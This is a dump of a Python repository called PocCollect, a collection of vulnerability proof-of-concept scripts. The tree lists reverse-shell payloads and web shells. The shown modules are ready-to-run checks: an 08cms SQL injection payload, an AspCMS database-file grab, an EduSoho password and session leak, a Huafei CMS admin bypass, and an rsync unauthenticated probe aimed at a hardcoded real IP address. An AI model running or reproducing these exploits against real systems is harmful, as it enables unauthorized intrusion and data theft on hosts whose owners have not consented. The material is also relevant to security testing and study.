├── .gitignore
├── .idea
├── PocCollect.iml
├── misc.xml
├── modules.xml
├── vcs.xml
└── workspace.xml
├── LICENSE
├── README.md
├── application
├── __init__.py
├── rsync
│ ├── __init__.py
│ ├── rsync_auth.py
│ └── t.py
└── t.py
├── bugscan_to_poccollect.py
├── cms
├── 08cms
│ ├── 08cms_1d42d5fc5efdd2ecbf8157a1bf1ac292.py
│ └── __init__.py
├── __init__.py
├── aspcms
│ ├── __init__.py
│ └── aspcms_13218a43f832e58d66688ed73e123044.py
├── edusohocms
│ ├── __init__.py
│ └── edusohocms_3d644fd5efb2fc076e04a786e1190083.py
├── huaficms
│ ├── __init__.py
│ └── huaficms_c8eb9652690ea8366b0f4852d5aeaead.py
├── miniCurl.py
├── phpcms
│ ├── __init__.py
│ ├── phpcms_v9_6.py
│ └── t.py
├── sdcms
│ ├── __init__.py
│ └── sdcms_3114b79e6d650cbdbaf0e8f592f884ad.py
└── t.py
├── component
├── JDWP
│ ├── JDWPvul.py
│ ├── __init__.py
│ ├── script
│ │ └── jdwpshellifier.py
│ └── t.py
├── __init__.py
├── bash
│ ├── __init__.py
│ ├── bash.py
│ └── t.py
├── cacti
│ ├── __init__.py
│ ├── cactifiledisclosure.py
│ ├── cactiweathermap.py
│ └── t.py
├── docker
│ ├── __init__.py
│ ├── dockerleak.py
│ ├── script
│ │ └── docker_unauth.py
│ └── t.py
├── elasticsearch
│ ├── __init__.py
│ ├── elasticsearch_groovy.py
│ ├── elasticsearch_nodestate.py
│ └── t.py
├── fast_cgi
│ ├── __init__.py
│ ├── fast_cgi.py
│ └── t.py
├── joomla
│ ├── __init__.py
│ ├── joomla_unrec.py
│ └── t.py
├── openssl
│ ├── __init__.py
│ ├── heartbleed.py
│ ├── script
│ │ └── heartbleedpoc.py
│ └── t.py
├── redis
│ ├── __init__.py
│ ├── redis_unauth.py
│ └── t.py
├── smb
│ ├── __init__.py
│ ├── ms17_010.py
│ └── t.py
├── struts
│ ├── __init__.py
│ ├── script
│ │ ├── __init__.py
│ │ └── linktool.py
│ ├── struts032test.py
│ ├── struts045.py
│ ├── struts2016.py
│ ├── struts2019.py
│ ├── struts2032.py
│ ├── struts2046.py
│ ├── struts2devmode.py
│ └── t.py
├── t.py
├── test
│ └── __init__.py
└── zebra
│ ├── __init__.py
│ ├── a.out
│ ├── t.py
│ └── zebradefaultpass.py
├── database
├── __init__.py
├── mongo
│ ├── __init__.py
│ ├── mongo_auth.py
│ └── t.py
├── postgresql
│ ├── __init__.py
│ └── postgresql_3c99590b8794b5c7ed0693e732916e92.py
└── t.py
└── middileware
├── __init__.py
├── apache
├── __init__.py
├── apache_state.py
└── t.py
├── axis
├── __init__.py
├── axis_config_read.py
├── axis_crackpass.py
├── axis_info.py
└── t.py
├── glassfish
├── __init__.py
├── glassfish_crackpass.py
├── glassfish_fileread.py
└── t.py
├── iis
├── __init__.py
├── iis6.0_cve-2017-7269.py
├── iis_shortname.py
├── ms15_034.py
└── t.py
├── jboss
├── __init__.py
├── jboss_crackpass.py
├── jboss_head_getshell.py
├── jboss_info.py
├── jboss_unrce.py
├── shell.jsp
├── t.py
├── upload.jar
└── vultest.dat
├── resin
├── __init__.py
├── resin_crackpass.py
├── resin_fileread.py
├── resin_fileread2.py
├── resin_fileread3.py
├── resin_fileread4.py
└── t.py
├── t.py
├── tomcat
├── __init__.py
├── t.py
└── tomcat_crackpass.py
├── weblogic
├── __init__.py
├── collections_3.2.0.jar
├── javax.jar
├── payload_bin
│ ├── inst.jar
│ ├── nc.exe
│ ├── payload_Linux_delete.bin
│ ├── payload_Linux_inst.bin
│ ├── payload_Linux_reverse.bin
│ ├── payload_Linux_uninst.bin
│ ├── payload_Linux_upload_inst.bin
│ ├── payload_Linux_upload_reverse.bin
│ ├── payload_Linux_upload_uninst.bin
│ ├── payload_Windows_delete.bin
│ ├── payload_Windows_inst.bin
│ ├── payload_Windows_reverse.bin
│ ├── payload_Windows_uninst.bin
│ ├── payload_Windows_upload_inst.bin
│ ├── payload_Windows_upload_reverse.bin
│ ├── payload_Windows_upload_uninst.bin
│ ├── reverse.jar
│ ├── reverse_shell.py
│ └── uninst.jar
├── shellApp.jar
├── t.py
├── weblogic.jar
├── weblogic_crackpass.py
└── weblogic_unrec.py
└── zabbix
├── __init__.py
├── t.py
├── zabbix_sqlhack.py
├── zabbix_sqli_v2-3.03.py
└── zabbix_weakpass.py
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 | *$py.class
5 |
6 | # C extensions
7 | *.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | env/
12 | build/
13 | develop-eggs/
14 | dist/
15 | downloads/
16 | eggs/
17 | .eggs/
18 | lib/
19 | lib64/
20 | parts/
21 | sdist/
22 | var/
23 | *.egg-info/
24 | .installed.cfg
25 | *.egg
26 |
27 | # PyInstaller
28 | # Usually these files are written by a python script from a template
29 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
30 | *.manifest
31 | *.spec
32 |
33 | # Installer logs
34 | pip-log.txt
35 | pip-delete-this-directory.txt
36 |
37 | # Unit test / coverage reports
38 | htmlcov/
39 | .tox/
40 | .coverage
41 | .coverage.*
42 | .cache
43 | nosetests.xml
44 | coverage.xml
45 | *,cover
46 | .hypothesis/
47 |
48 | # Translations
49 | *.mo
50 | *.pot
51 |
52 | # Django stuff:
53 | *.log
54 | local_settings.py
55 |
56 | # Flask stuff:
57 | instance/
58 | .webassets-cache
59 |
60 | # Scrapy stuff:
61 | .scrapy
62 |
63 | # Sphinx documentation
64 | docs/_build/
65 |
66 | # PyBuilder
67 | target/
68 |
69 | # IPython Notebook
70 | .ipynb_checkpoints
71 |
72 | # pyenv
73 | .python-version
74 |
75 | # celery beat schedule file
76 | celerybeat-schedule
77 |
78 | # dotenv
79 | .env
80 |
81 | # virtualenv
82 | venv/
83 | ENV/
84 |
85 | # Spyder project settings
86 | .spyderproject
87 |
88 | # Rope project settings
89 | .ropeproject
90 |
--------------------------------------------------------------------------------
/.idea/PocCollect.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | The MIT License (MIT)
2 |
3 | Copyright (c) 2016 sherwel
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # PocCollect
2 |
3 | [](http://nanshihui.github.io/2016/01/21/ToolForSpider%E7%AE%80%E4%BB%8B/) [](https://www.python.org/) [](http://nanshihui.github.io/2016/01/21/ToolForSpider%E7%AE%80%E4%BB%8B/)
4 |
5 | PocCollect contains a plenty of POCs based on python,all the POCs from the internet and retest by myself and they do work.
6 |
7 | POC inside contains common vulnerability,include Struts2,Heartbleed,Java Deserialization and so on.
8 |
9 |
10 |
11 | Installation
12 | ----
13 |
14 | you can download PocCollect by cloning the [Git](https://github.com/nanshihui/PocCollect) repository:
15 |
16 | git clone https://github.com/nanshihui/PocCollect.git
17 |
18 | PocCollect works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
19 |
20 | Notice
21 | ----
22 | POC incide are only for learning purposes .Do not use for other illegal purposes.
23 |
--------------------------------------------------------------------------------
/application/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/application/__init__.py
--------------------------------------------------------------------------------
/application/rsync/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['rsync', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if int(port) in [873] or productname.get('protocol','') in ['rsync']:
6 | return True
7 | else:
8 |
9 | return False
--------------------------------------------------------------------------------
/application/rsync/rsync_auth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 |
5 | import socket
6 |
7 | import time
8 |
9 |
10 | class P(T):
11 | def __init__(self):
12 | T.__init__(self)
13 |
14 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
15 |
16 | result = {}
17 | result['result']=False
18 | s=None
19 |
20 |
21 | try:
22 |
23 | payload = '\x40\x52\x53\x59\x4e\x43\x44\x3a\x20\x33\x31\x2e\x30\x0a'
24 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
25 | socket.setdefaulttimeout(10)
26 |
27 |
28 | s.connect((ip, int(port)))
29 | s.sendall(payload)
30 | time.sleep(2)
31 | # server init.
32 | initinfo = s.recv(400)
33 | if "RSYNCD" in initinfo:
34 | s.sendall("\x0a")
35 | time.sleep(2)
36 | modulelist = s.recv(200)
37 |
38 | if len(modulelist) > 0:
39 |
40 |
41 | result['result'] = True
42 | result['VerifyInfo'] = {}
43 | result['VerifyInfo']['type'] = 'rsync unauth access vul'
44 | result['VerifyInfo']['URL'] = ip
45 | result['VerifyInfo']['Port'] = port
46 |
47 | result['VerifyInfo']['result'] = str(modulelist)
48 |
49 |
50 | except Exception,e:
51 | print e.text
52 | finally:
53 | if s is not None:
54 | s.close()
55 | return result
56 | if __name__ == '__main__':
57 | # print P().verify(ip='61.146.115.83',port='81')
58 | print P().verify(ip='118.244.21.121', port='873')
59 |
--------------------------------------------------------------------------------
/application/rsync/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/application/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 |
15 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
16 | ##
17 | #head 返回的请求头
18 | #context 返回请求正文html代码
19 | #ip 请求ip
20 | #port 请求端口
21 | #productname 请求的组件产品
22 | #keywords 暂时已知的关键词组件
23 | #hackinfo 备用字段
24 |
25 |
26 |
27 |
28 | return True
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/bugscan_to_poccollect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import os ,random,re
3 | import logger
4 | logge = logger.initLog("log.log", 2, True,'a')
5 | def readpath(path):
6 | rootpath=path
7 | files = os.listdir(path)
8 | for i in xrange(len(files)):
9 | files[i]=rootpath+'/'+files[i]
10 | return files
11 | def locatecode(path,targetpath):
12 | sourcepath=path
13 | with open(path,'r') as fileitem:
14 | content = fileitem.readlines()
15 | func_assign_line=0
16 | func_audit_line=0
17 | func_main_line=0
18 | func_targetfile=None
19 | func_def_line=0
20 | params=None
21 | service=None
22 | def_line=[]
23 | targetpath=targetpath
24 | security_label=None
25 | targetfilepath=None
26 | for line in xrange(len(content)):
27 |
28 | if 'curl' in content[line] and line4:
41 | error(' may fail,multi params ',sourcepath,targetfilepath)
42 | func_audit_line=line
43 |
44 | # writecontent(targetfilepath,content,line,len(content)-1,params,'')
45 |
46 | if '__name__' in content[line]:
47 | func_main_line=line
48 | def_line.append(line)
49 | if 'if ' in content[line] and ' service' in content[line]:
50 | prefix=content[line].find('"')
51 | suffix=content[line].rfind('"')
52 | service=content[line][prefix+1:suffix]
53 | if 'if service' in service:
54 | prefix=content[line].find('\'')
55 | suffix=content[line].rfind('\'')
56 | service=content[line][prefix+1:suffix]
57 | index=targetpath+'/'+service
58 | isexit=os.path.exists(index)
59 | if not isexit:
60 | os.mkdir(index)
61 | initfile=index+'/__init__.py'
62 |
63 | isexit=os.path.exists(initfile)
64 | if not isexit:
65 | os.mknod(initfile)
66 | write__init__(initfile,service)
67 | targetfilepath=index+'/'+service+'_'+md5(path)+'.py'
68 | func_targetfile=targetfilepath
69 | if func_audit_line!=0 :
70 | match = re.search(r'security_\w+', content[line])
71 | if match:
72 | item=match.group(0)
73 | security_label=item
74 | suffix_params=content[line].rfind(')')
75 | labeltype=security_label.split('_')[1]
76 | content[line]=content[line][0:suffix_params]+',result,\''+labeltype+'\')\n'
77 | content[line]=content[line].replace(item,'output')
78 | if line>func_main_line:
79 | url=''
80 | if 'audit(assign' in content[line]:
81 | match=re.search(r'((http|ftp|https)://)(([a-zA-Z0-9\._-]+\.[a-zA-Z]{2,6})|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(:[0-9]{1,4})*(/[a-zA-Z0-9\&%_\./-~-]*)?',"""audit(assign('www','http://yunlai.cn:803/sfdsfds/')[1])""")
82 | if match:
83 | url=match.group(0)
84 | else:
85 | error(' may fail, no url ',sourcepath,targetfilepath)
86 | match = re.search(r'\w+',content[line])
87 | if match:
88 |
89 | t= match.group(0)
90 |
91 | index=content[line].find(t)
92 | msg=' '*index+"""print P().verify(ip='%s',port='80')\n"""%url
93 | content[line]=msg
94 | else:
95 | error(' may fail, no url word',sourcepath,targetfilepath)
96 | if 'from dummy import *' in content[line]:
97 | content[line]=''
98 | # writecontent(targetfilepath,array,0,0)
99 | if func_assign_line==0:
100 |
101 | error(' may fail, no assign func',sourcepath,targetfilepath)
102 | path={}
103 | path['sourcepath']=sourcepath
104 | path['func_assign_line']=func_assign_line
105 | path['func_audit_line']=func_audit_line
106 | path['func_main_line']=func_main_line
107 | path['func_targetfile']=func_targetfile
108 | path['func_def_line']=func_def_line
109 | path['security_label']=security_label
110 | path['targetfilepath']=targetfilepath
111 | path['def_line']=def_line
112 | if security_label is None:
113 | error(' may fail, no security_label',sourcepath,targetfilepath)
114 | # path['func_warn_line']=func_warn_line
115 | # path['func_info_line']=func_info_line
116 | # path['func_notice_line']=func_notice_line
117 | path['params']=params
118 | path['service']=service
119 | if func_def_line!=func_assign_line:
120 | error(' may fail, have other func',sourcepath,targetfilepath)
121 |
122 | return path,content
123 | def error(msg,pathsrc,pathadd):
124 | global logge
125 | logge.info("info %s %s %s", "may fail, "+msg,pathsrc,pathadd)
126 | def reform(path,targetpath):
127 | path_line,content=locatecode(path,targetpath)
128 | targetfilepath=path_line.get('func_targetfile',None)
129 | func_assign_line=path_line.get('func_assign_line',0)
130 | func_audit_line=path_line.get('func_audit_line',0)
131 | func_main_line=path_line.get('func_main_line',0)
132 | security_label=path_line.get('security_label','')
133 | sourcepath=path_line.get('sourcepath','')
134 | params=path_line.get('params','')
135 | def_line=path_line.get('def_line',[])
136 |
137 | deflist={}
138 | if targetfilepath:
139 | import_file(targetfilepath)
140 | writeprefix(targetfilepath,content,0,def_line[0]-1,'a')
141 | for i in xrange(len(def_line)):
142 |
143 | if def_line[i]!=func_audit_line and def_line[i]!=func_main_line and def_line[i]!=func_assign_line:
144 |
145 |
146 | writeprefix(targetfilepath,content,def_line[i],def_line[i+1]-1,'a')
147 | if def_line[i]==func_audit_line:
148 | deflist['func_audit_line']=i
149 |
150 | elif def_line[i]==func_main_line:
151 | deflist['func_main_line']=i
152 | elif def_line[i]==func_assign_line:
153 | deflist['func_assign_line']=i
154 |
155 | writeclass(targetfilepath,type='a',service=params)
156 | print targetfilepath,sourcepath
157 | print deflist
158 | print def_line
159 | if deflist['func_audit_line']+1==len(deflist):
160 | writeprefix(targetfilepath,content,func_audit_line+1,len(content),'a',default=' ')
161 |
162 | else:
163 | writeprefix(targetfilepath,content,func_audit_line+1,def_line[deflist['func_audit_line']+1]-1,'a',default=' ')
164 |
165 | writereturn(targetfilepath,type='a')
166 | writeoutput(targetfilepath,'a',path_line)
167 |
168 |
169 |
170 | if deflist['func_audit_line']+1==len(deflist):
171 | pass
172 |
173 | else:
174 | writeprefix(targetfilepath,content,func_main_line,len(content),'a')
175 |
176 |
177 |
178 |
179 | contents="""\n#%s\n#%s"""%(targetfilepath,sourcepath)
180 | writecontent(targetfilepath,contents)
181 |
182 |
183 | def writeoutput(targetpath='',type='a',vulinfo={}):
184 | service=vulinfo.get('service','')
185 | security_label=vulinfo.get('security_label','')
186 | targetfilepath=vulinfo.get('func_targetfile',None)
187 |
188 | content="""
189 |
190 | def output(url,result,label):
191 | info = url + ' %s Vul '
192 | result['result']=True
193 | result['VerifyInfo'] = {}
194 | result['VerifyInfo']['type']='%s Vul'
195 | result['VerifyInfo']['URL'] =url
196 | result['VerifyInfo']['payload']='%s'
197 | result['VerifyInfo']['level']=label
198 | result['VerifyInfo']['result'] =info
199 |
200 | """%(service,service,targetfilepath)
201 | writecontent(targetpath,content)
202 |
203 |
204 | def writereturn(targetpath,type='a'):
205 | content="""
206 | del curl
207 | return result
208 | """
209 | writecontent(targetpath,content)
210 | def writeclass(targetpath,type='w',service=''):
211 | content="""
212 | class P(T):
213 | def __init__(self):
214 | T.__init__(self)
215 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
216 | %s='http://'+ip+':'+port+'/'
217 | curl=Curl()
218 | result = {}
219 | result['result']=False
220 |
221 | """%service
222 | writecontent(targetpath,content,type)
223 |
224 | def import_file(targetpath,type='w'):
225 |
226 | content="""from ..miniCurl import Curl
227 | from ..t import T
228 | """
229 | writecontent(targetpath,content,type)
230 |
231 | def writeprefix(filepath,array,start,end,type,default=''):
232 | filebind = open(filepath, type)
233 | while end>start or end==start:
234 | if start==len(array) or start >len(array):
235 | break
236 | item=default+array[start]
237 | filebind.write(item)
238 | start=start+1
239 | filebind.close()
240 | def writecontent(filepath,content,type='a'):
241 | filebind = open(filepath, type)
242 | filebind.write(content)
243 | filebind.close()
244 | def write__init__(path,service):
245 | content="""KEYWORDS = ['%s', ]
246 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
247 |
248 |
249 | if '%s' in context or '%s' in head:
250 | return True
251 | else:
252 | return False""" %(service,service,service)
253 |
254 | targetfile=open(path,'w')
255 | targetfile.write(content)
256 | targetfile.close()
257 | def md5(str):
258 | import hashlib
259 | import types
260 | if type(str) is types.StringType:
261 | m = hashlib.md5()
262 | m.update(str)
263 | return m.hexdigest()
264 | else:
265 | return ''
266 |
267 |
268 | if __name__ == "__main__":
269 |
270 | path=readpath(os.path.split(os.path.realpath(__file__))[0]+'/codesrc')
271 |
272 | for i in path:
273 | reform(i,'/root/github/poccreate/thirdparty')
274 |
275 | # reform('/root/github/poccreate/codesrc/exp-133.py','/root/github/poccreate/thirdparty')
276 |
277 |
278 |
--------------------------------------------------------------------------------
/cms/08cms/08cms_1d42d5fc5efdd2ecbf8157a1bf1ac292.py:
--------------------------------------------------------------------------------
1 | #/usr/bin/python
2 | #-*- coding: utf-8 -*-
3 | #Refer http://www.wooyun.org/bugs/wooyun-2015-0110861
4 | #__Author__ = 上善若水
5 | #_PlugName_ = 08CMS_sql Plugin
6 | #_FileName_ = 08CMS_sql.py
7 | from ..miniCurl import Curl
8 | from ..t import T
9 |
10 |
11 | class P(T):
12 | def __init__(self):
13 | T.__init__(self)
14 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
15 | arg='http://'+ip+':'+port+'/'
16 | curl=Curl()
17 | result = {}
18 | result['result']=False
19 |
20 | url = arg + "info.php?fid=1&tblprefix=cms_msession"
21 | payload = "/**/where/**/1/**/and/**/updatexml(1,concat(0x37,(select/**/md5(520)/**/limit/**/0,1)),1)%23"
22 | geturl = url + payload
23 | code, head, body, errcode, final_url = curl.curl2(geturl,cookie="umW_msid=rsLQWU")
24 | if code == 200 and 'cf67355a3333e6e143439161adc2d82e' in body:
25 | output(url,result,'hole')
26 |
27 |
28 | del curl
29 | return result
30 |
31 |
32 | def output(url,result,label):
33 | info = url + ' 08cms Vul '
34 | result['result']=True
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['type']='08cms Vul'
37 | result['VerifyInfo']['URL'] =url
38 | result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/08cms/08cms_1d42d5fc5efdd2ecbf8157a1bf1ac292.py'
39 | result['VerifyInfo']['level']=label
40 | result['VerifyInfo']['result'] =info
41 |
42 | if __name__ == '__main__':
43 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
44 |
45 | #/root/github/poccreate/thirdparty/08cms/08cms_1d42d5fc5efdd2ecbf8157a1bf1ac292.py
46 | #/root/github/poccreate/codesrc/exp-885.py
--------------------------------------------------------------------------------
/cms/08cms/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['08cms', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if '08cms' in context or '08cms' in head:
6 | return True
7 | else:
8 | return False
--------------------------------------------------------------------------------
/cms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/cms/__init__.py
--------------------------------------------------------------------------------
/cms/aspcms/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['aspcms', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if 'aspcms' in context or 'aspcms' in head:
6 | return True
7 | else:
8 | return False
--------------------------------------------------------------------------------
/cms/aspcms/aspcms_13218a43f832e58d66688ed73e123044.py:
--------------------------------------------------------------------------------
1 | from ..miniCurl import Curl
2 | from ..t import T
3 | #! /usr/bin/env python
4 | # -*- coding: utf-8 -*-
5 | #author: oneroy@qq.com
6 | #refer: http://www.wooyun.org/bugs/wooyun-2010-060483
7 |
8 | import re
9 |
10 |
11 | class P(T):
12 | def __init__(self):
13 | T.__init__(self)
14 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
15 | arg='http://'+ip+':'+port+'/'
16 | curl=Curl()
17 | result = {}
18 | result['result']=False
19 |
20 | payloads=["data/%23aspcms252.asp","data/%23data.asp"]
21 | for payload in payloads:
22 | url = arg + payload
23 | code, head, res, errcode,_ = curl.curl2(url)
24 | if (code==200 or code==500) and "Standard Jet DB" in res:
25 | output(url,result,'info')
26 |
27 |
28 | del curl
29 | return result
30 |
31 |
32 | def output(url,result,label):
33 | info = url + ' aspcms Vul '
34 | result['result']=True
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['type']='aspcms Vul'
37 | result['VerifyInfo']['URL'] =url
38 | result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/aspcms/aspcms_13218a43f832e58d66688ed73e123044.py'
39 | result['VerifyInfo']['level']=label
40 | result['VerifyInfo']['result'] =info
41 |
42 | if __name__ == '__main__':
43 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
44 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
45 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
46 |
47 | #/root/github/poccreate/thirdparty/aspcms/aspcms_13218a43f832e58d66688ed73e123044.py
48 | #/root/github/poccreate/codesrc/exp-1769.py
--------------------------------------------------------------------------------
/cms/edusohocms/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['edusohocms', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if 'edusohocms' in context or 'edusohocms' in head:
6 | return True
7 | else:
8 | return False
--------------------------------------------------------------------------------
/cms/edusohocms/edusohocms_3d644fd5efb2fc076e04a786e1190083.py:
--------------------------------------------------------------------------------
1 | from ..miniCurl import Curl
2 | from ..t import T
3 | #!/usr/bin/env python
4 | #coding:utf-8
5 |
6 |
7 | class P(T):
8 | def __init__(self):
9 | T.__init__(self)
10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
11 | arg='http://'+ip+':'+port+'/'
12 | curl=Curl()
13 | result = {}
14 | result['result']=False
15 |
16 | poc1 = arg+'api/users/1/followings'
17 | poc2 = arg+'api/users/1/friendship?toIds[]=a'
18 | code, head, res1, errcode, _ = curl.curl2(poc1)
19 | code, head, res2, errcode, _ = curl.curl2(poc2)
20 | if code == 500 and "loginSessionId" in res1:
21 | output("edusoho vulnerable:"+poc1,result,'hole')
22 | if code == 500 and "'password' => '" in res1:
23 | output("edusoho vulnerable:"+poc2,result,'hole')
24 |
25 |
26 | del curl
27 | return result
28 |
29 |
30 | def output(url,result,label):
31 | info = url + ' edusohocms Vul '
32 | result['result']=True
33 | result['VerifyInfo'] = {}
34 | result['VerifyInfo']['type']='edusohocms Vul'
35 | result['VerifyInfo']['URL'] =url
36 | result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/edusohocms/edusohocms_3d644fd5efb2fc076e04a786e1190083.py'
37 | result['VerifyInfo']['level']=label
38 | result['VerifyInfo']['result'] =info
39 |
40 | if __name__ == '__main__':
41 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
42 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
43 |
44 | #/root/github/poccreate/thirdparty/edusohocms/edusohocms_3d644fd5efb2fc076e04a786e1190083.py
45 | #/root/github/poccreate/codesrc/exp-2193.py
--------------------------------------------------------------------------------
/cms/huaficms/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['huaficms', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if 'huaficms' in context or 'huaficms' in head:
6 | return True
7 | else:
8 | return False
--------------------------------------------------------------------------------
/cms/huaficms/huaficms_c8eb9652690ea8366b0f4852d5aeaead.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/evn python
2 | #-*-:coding:utf-8 -*-
3 | #Author:404
4 | #Name:华飞科技建站系统禁用js可以访问后台可以添加管理
5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-083888
6 |
7 | from ..miniCurl import Curl
8 | from ..t import T
9 |
10 | class P(T):
11 | def __init__(self):
12 | T.__init__(self)
13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
14 | arg='http://'+ip+':'+port+'/'
15 | curl=Curl()
16 | result = {}
17 | result['result']=False
18 |
19 | url=arg+"admin/User/manageadmin.aspx"
20 | code,head,res,errcode,_=curl.curl2(url)
21 | if code==200 and 'addadmin.aspx' in res:
22 | output(url,result,'hole')
23 |
24 |
25 | del curl
26 | return result
27 |
28 |
29 | def output(url,result,label):
30 | info = url + ' huaficms Vul '
31 | result['result']=True
32 | result['VerifyInfo'] = {}
33 | result['VerifyInfo']['type']='huaficms Vul'
34 | result['VerifyInfo']['URL'] =url
35 | result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/huaficms/huaficms_c8eb9652690ea8366b0f4852d5aeaead.py'
36 | result['VerifyInfo']['level']=label
37 | result['VerifyInfo']['result'] =info
38 |
39 | if __name__=="__main__":
40 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
41 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
42 |
43 | #/root/github/poccreate/thirdparty/huaficms/huaficms_c8eb9652690ea8366b0f4852d5aeaead.py
44 | #/root/github/poccreate/codesrc/exp-2647.py
--------------------------------------------------------------------------------
/cms/phpcms/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['phpcms', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
